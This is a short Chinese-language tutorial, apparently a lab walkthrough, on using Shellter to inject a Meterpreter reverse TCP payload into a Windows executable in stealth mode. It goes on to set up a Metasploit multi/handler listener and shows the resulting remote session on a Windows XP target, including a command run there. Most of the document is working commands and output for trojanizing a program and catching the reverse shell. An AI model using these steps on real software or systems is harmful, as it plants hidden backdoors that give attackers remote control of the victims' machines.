Shellter实操
shellter主要功能为入侵PE文件(exe),可以将shell代码注入任何32位的本地windows应用程序当中,它允许搭配metasploit框架使用
安装shellter
apt-get install shellter
安装完成后,提示符输入shellter打开
成功打开后会出现一个
这里提示可以选择自动(A)手动(M)以及帮助(H),我们选择A
这一步是提供pe目标文件,下面是我自己导入的一个exe文件
大概过个一分钟(或更短)就会提示成功
接下来提示是否选择隐身模式,选择是
是否选择列表内的载荷或自定义
我们选择tcp的,并输入ip和端口
出现这个说明注入成功
打开metasploit框架
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.3.43
set lport 5555
exploit -j -z
可以将上述命令存一个xx.rc文件中
使用metasploit -r xx.rc运行
msf6 > resource geek.rc
[*] Processing /root/geek.rc for ERB directives.
resource (/root/geek.rc)> use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
resource (/root/geek.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (/root/geek.rc)> set lhost 192.168.3.43
lhost => 192.168.3.43
resource (/root/geek.rc)> set lport 5555
lport => 5555
resource (/root/geek.rc)> exploit -j -z
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.3.43:5555
msf6 exploit(multi/handler) >
在另一台靶机内打开刚才注入的exe程序
kali主机这里成功出现一个session
msf6 exploit(multi/handler) > [*] Sending stage (175174 bytes) to 192.168.3.29
[*] Meterpreter session 1 opened (192.168.3.43:5555 -> 192.168.3.29:3303) at 2021-08-03 22:45:15 +0800
msf6 exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows WINXP-1\st21 @ WINXP-1 192.168.3.43:5555 -> 192.168.3.29:3303 (192.168.3.29)
msf6 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...
meterpreter > ipconfig
Interface 1
============
Name : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU : 1520
IPv4 Address : 127.0.0.1
Interface 2
============
Name : AMD PCNET Family PCI Ethernet Adapter - rface
Hardware MAC : 00:0c:29:95:e3:ea
MTU : 1500
IPv4 Address : 192.168.3.29
IPv4 Netmask : 255.255.255.0
Interface 65540
============
Name : Bluetooth خ▒
Hardware MAC : 94:b8:6d:d2:53:f1
MTU : 1500
meterpreter >